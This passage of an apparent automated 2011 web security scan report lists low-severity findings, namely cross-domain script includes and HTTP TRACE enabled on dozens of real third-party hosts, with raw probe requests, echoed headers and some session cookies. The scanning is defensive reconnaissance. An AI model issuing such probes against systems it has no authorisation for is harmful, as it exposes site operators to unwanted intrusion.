<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Ch
...[SNIP]...
</body>


<script language="javascript" src="https://www.upsellit.com/upsellitJS4.jsp?siteID=2723&qs=254271203240331329344340313313344321295289275341328340277313&trackingInfo=https%3A%2F%2Fwww.truecredit.com%2Fproducts%2Fupsellit%2Forder.jsp%3FversionID%3D0%26package%3DFree7DayTrialTriBureauCMU_TUTrial%26formName%3DfreeSingleCMUChoice%26trackPixel%3Dupsellit%26loc%3D2370"></script>
...[SNIP]...

24.290. https://www.trustedid.com/cmalp1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /cmalp1.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cmalp1.php?promoRefCode=SEMGOOGCM14DF&gclid=CLTp5ZX1tagCFUSo4Aod61iHCA HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:23:36 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303676616385263; path=/; domain=.trustedid.com
Set-Cookie: TSI=n9aijp6kmv2idr7asjh3a48343; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 20:23:35 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=tsis0amhjkv950im9ira5ikvg6; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 20:23:36 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 20733

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>TrustedID - America's Identity Theft Protection Company - Identity Theft P
...[SNIP]...
</script>

<script src="https://www.popularmedia.net/site/c1fd33e0-df89-012b-2f61-f000c17e07c1" type="text/javascript"></script>
...[SNIP]...
<!-- GOOGLE ANALYTICS start -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

24.291. https://www.trustedid.com/registration.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /registration.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /registration.php?promoRefCode=NXTIDF01IDEFT HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:50:27 GMT
Server: Apache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=NXTIDF01IDEFT; expires=Tue, 24-May-2011 03:50:27 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:50:26 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=rad7gd7ho7s7nspvlonpj701d5; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=NXTIDF01IDEFT; expires=Tue, 24-May-2011 03:50:27 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 03:50:27 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 26670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>Identity Theft Protection Enrollment - TrustedID Registration</title>
<met
...[SNIP]...
<!-- GOOGLE ANALYTICS start -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

24.292. https://www.trustedid.com/suzeidprotector/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:19 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614739643665; path=/; domain=.trustedid.com
Set-Cookie: TSI=lsgdamrpaddiv88ogrb60v3bq3; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: promoRefCode=NXDIRSUZIDPANN; expires=Tue, 24-May-2011 03:12:19 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:12:18 GMT; path=/; domain=.trustedid.com; secure
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<!-- GOOGLE ANALYTICS start -->
           <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

24.293. http://www.youtube.com/embed/7SyQh_Wx72M  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/7SyQh_Wx72M

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /embed/7SyQh_Wx72M HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/about
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:16 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 9517
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - What&#39;s it Like to Work at Infusionsoft?</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflpBoefE.css">


</
...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed-vflcnZxoT.js"></script>
...[SNIP]...

25. TRACE method is enabled  previous  next
There are 40 instances of this issue:


25.1. http://2byto.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2byto.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 2byto.com
Cookie: 68563a11c1b7c0f4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:40:39 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: 2byto.com
Cookie: 68563a11c1b7c0f4
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: 2byto.com
X-Forwarded-Server: 2byto.com
Connection: Keep-Alive


25.2. http://affiliate.idgtracker.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /

Request

TRACE / HTTP/1.0
Host: affiliate.idgtracker.com
Cookie: f9d1aa18baf959e9

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:19:20 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: affiliate.idgtracker.com
Cookie: f9d1aa18baf959e9


25.3. http://analytic.hotelclub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /

Request

TRACE / HTTP/1.0
Host: analytic.hotelclub.com
Cookie: faf8b0a3772d280a

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:52 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: analytic.hotelclub.com
Cookie: faf8b0a3772d280a
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.4. http://bh.contextweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 62255f31f2ce7f3f

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Content-Type: message/http
Content-Length: 130
Date: Sun, 24 Apr 2011 12:33:50 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 62255f31f2ce7f3f
connection: Keep-Alive
cw-userhostaddress: 173.193.214.243

25.5. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: ac281e232f8af033

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 72
Date: Sun, 24 Apr 2011 03:16:36 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: ac281e232f8af033

25.6. http://chat.echomail.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chat.echomail.com
Path:   /

Request

TRACE / HTTP/1.0
Host: chat.echomail.com
Cookie: 42986c53dddc19ee

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:54 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: chat.echomail.com
Cookie: 42986c53dddc19ee


25.7. http://chat.india.interactive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chat.india.interactive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: chat.india.interactive.com
Cookie: dea7523dedf174be

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:50:23 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: chat.india.interactive.com
Cookie: dea7523dedf174be


25.8. http://d.w55c.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.w55c.net
Path:   /

Request

TRACE / HTTP/1.0
Host: d.w55c.net
Cookie: 5203e1ec2023469e

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d.w55c.net
Cookie: 5203e1ec2023469e
X-Forwarded-For: 173.193.214.243


25.9. http://equifaxps.122.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equifaxps.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: equifaxps.122.2o7.net
Cookie: 648932de6264bf40

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:19 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: equifaxps.122.2o7.net
Cookie: 648932de6264bf40
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.10. http://home.controlcase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.controlcase.com
Path:   /

Request

TRACE / HTTP/1.0
Host: home.controlcase.com
Cookie: e82e54adcc8fdec6

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:11:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: home.controlcase.com
Cookie: e82e54adcc8fdec6


25.11. http://i35.tinypic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i35.tinypic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: i35.tinypic.com
Cookie: 1ae293ed2a33717c

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sun, 24 Apr 2011 12:44:44 GMT
Content-Type: message/http
Content-Length: 105
Expires: Sun, 24 Apr 2011 12:44:44 GMT
Connection: close

TRACE / HTTP/1.0
Host: i35.tinypic.com
Cookie: 1ae293ed2a33717c
_FP_X_URL: http://i35.tinypic.com/


25.12. http://image2.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: fa8fa5841656850b

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:03 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: fa8fa5841656850b


25.13. http://landing.americanexpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.americanexpress.com
Path:   /

Request

TRACE / HTTP/1.0
Host: landing.americanexpress.com
Cookie: 979cf867269c1888

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:53:42 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: landing.americanexpress.com
Cookie: 979cf867269c1888


25.14. http://matcher.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: de5d6c74654f36dd

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:44 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: de5d6c74654f36dd
Connection: Keep-Alive
MIG_IP: 173.193.214.243


25.15. http://matcher.bidder8.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher.bidder8.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 1b3fb026d6b9cb67

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:47 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 1b3fb026d6b9cb67
Connection: Keep-Alive
MIG_IP: 173.193.214.243


25.16. http://metrics.citibank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.citibank.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.citibank.com
Cookie: 1c09eb4296159683

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:09 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.citibank.com
Cookie: 1c09eb4296159683
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.17. http://microsoftsto.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftsto.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: microsoftsto.112.2o7.net
Cookie: d51d65142421882d

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:53:06 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: microsoftsto.112.2o7.net
Cookie: d51d65142421882d
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.18. http://o.swisscom.ch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /

Request

TRACE / HTTP/1.0
Host: o.swisscom.ch
Cookie: 7b19959fdf5b1176

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:53 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: o.swisscom.ch
Cookie: 7b19959fdf5b1176
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.19. http://omni.pcworld.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omni.pcworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: omni.pcworld.com
Cookie: 41dbe61c68507116

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:50:55 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: omni.pcworld.com
Cookie: 41dbe61c68507116
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.20. http://oracleglobal.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: oracleglobal.112.2o7.net
Cookie: 31b04d19f5b052b2

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:45:42 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: oracleglobal.112.2o7.net
Cookie: 31b04d19f5b052b2
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.21. http://p.staticworld.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.staticworld.net
Path:   /

Request

TRACE / HTTP/1.0
Host: p.staticworld.net
Cookie: 83ffe7892c75e238

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:50:47 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: p.staticworld.net
Cookie: 83ffe7892c75e238
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.22. http://pixel.pcworld.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.pcworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.pcworld.com
Cookie: 4b813e9de9befb8b

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:30 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.pcworld.com
Cookie: 4b813e9de9befb8b
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.23. http://polls-cdn.linkedin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://polls-cdn.linkedin.com
Path:   /

Request

TRACE / HTTP/1.0
Host: polls-cdn.linkedin.com
Cookie: 64c81d650d16834b

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:24 GMT
Server: PWS/1.7.1.5
X-Px: nc jfk-te3-n30 ( origin>CONN)
Content-Length: 365
Content-Type: message/http
X-Powered-By: Servlet/3.0
Connection: close

TRACE /index.html HTTP/1.1
host: polls.linkedin.com
user-agent: Mozilla/5.0 (compatible; Panther)
accept: */*
accept-encoding: gzip
via: 1.1 jfk-te3-n30.panthercdn.com PWS/1.7.1.5
x-forwarded-for: 173.193.214.243, 66.114.49.160
x-forwarded-ip: 173.193.214.243
x-initial-url: http://polls-cdn.linkedin.com/
cookie: 64c81d650d16834b
connection: keep-alive

25.24. http://polls.linkedin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://polls.linkedin.com
Path:   /

Request

TRACE / HTTP/1.0
Host: polls.linkedin.com
Cookie: ca10d07604be32c6

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish Server Open Source Edition 3.0.1
Content-Type: message/http
Content-Length: 114
Date: Mon, 25 Apr 2011 00:48:07 GMT
Connection: close

TRACE /index.html HTTP/1.0
host: polls.linkedin.com
cookie: ca10d07604be32c6
x-forwarded-for: 173.193.214.243

25.25. http://secure-us.imrworldwide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 35cab18f13bbb8fa

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:49:05 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 35cab18f13bbb8fa
Host: secure-us.imrworldwide.com


25.26. https://secure.identityguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure.identityguard.com
Cookie: b7cf99cf05eed1ea

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:36:14 GMT
Server: Apache/2.2.0 (Fedora)
Set-Cookie: JSESSIONID=0000plyZsxRYuRqrkQ75yi4aISH:14ej3pg70; Path=/
Set-Cookie: REFERRER=""; Expires=Sun, 08 May 2011 03:35:23 GMT; Path=/
Content-Length: 380
Cache-Control: max-age=3600
Expires: Sun, 24 Apr 2011 04:36:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: message/http
Content-Language: en-US

TRACE /webapp/wcs/stores/servlet/ HTTP/1.0
Host: secure.identityguard.com
Cookie: b7cf99cf05eed1ea
$WSCS: DES-CBC3-SHA
$WSIS: true
$WSSC: https
$WSPR: HTTP/1.0
$WSRA: 173.193.214.243
$WSRH: 173.193.214.243
$WSSN: secure.identityguard.com
$WSSP: 443
$WSSI: LX8AAL5AumEkPZQcvMrC6YZxsLxYWFhYrJ
...[SNIP]...

25.27. https://secure.krypt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure.krypt.com
Cookie: dfac5c141d139beb

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:39:40 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: secure.krypt.com
Cookie: dfac5c141d139beb


25.28. https://secure.lifelock.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure.lifelock.com
Cookie: ff2c92baa6662f26

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:17:39 GMT
Connection: close
Content-Type: message/http
Set-Cookie: TS376161=b3043e60cd287e9cbf9ae25d58251ae1c123ec6b5c9d36434db39653; Path=/

TRACE / HTTP/1.0
Host: secure.lifelock.com
Cookie: ff2c92baa6662f26
X-Forwarded-For: 173.193.214.243


25.29. http://sensic.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensic.net
Path:   /

Request

TRACE / HTTP/1.0
Host: sensic.net
Cookie: 2f61ae3108907e0b

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sensic.net
Cookie: 2f61ae3108907e0b


25.30. http://smetrics.freecreditreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smetrics.freecreditreport.com
Path:   /

Request

TRACE / HTTP/1.0
Host: smetrics.freecreditreport.com
Cookie: f446ef6d93e6ccc9

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:02 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: smetrics.freecreditreport.com
Cookie: f446ef6d93e6ccc9
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.31. http://tracking.hubspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.hubspot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: aaea909df221938d

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:18 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: aaea909df221938d


25.32. http://transunioninteractive.122.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://transunioninteractive.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: transunioninteractive.122.2o7.net
Cookie: 70e1c06576276483

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:46 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: transunioninteractive.122.2o7.net
Cookie: 70e1c06576276483
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.33. https://vault.krypt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vault.krypt.com
Path:   /

Request

TRACE / HTTP/1.0
Host: vault.krypt.com
Cookie: e5394234a4cb2c0f

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: vault.krypt.com
Cookie: e5394234a4cb2c0f


25.34. http://widgets.digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: ce22dbc0ac903ef1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:06:31 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: ce22dbc0ac903ef1
Accept-Encoding: gzip
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 206.41.8.13
x-chpd-loop: 1
Via: 1.0 PXY002-MIAM.COTENDO.NET (chpd/4.00.0134.3)
Cneonction: c
...[SNIP]...

25.35. http://www.actividentity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.actividentity.com
Cookie: da41684f2b8b58b1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:27 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.actividentity.com
Cookie: da41684f2b8b58b1


25.36. http://www.fightidentitytheft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fightidentitytheft.com
Cookie: 7c372303b14ecbb7

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fightidentitytheft.com
Cookie: 7c372303b14ecbb7


25.37. http://www.krypt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.krypt.com
Cookie: b802984eed9f1800

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:06 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.krypt.com
Cookie: b802984eed9f1800


25.38. http://www.nextadvisor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
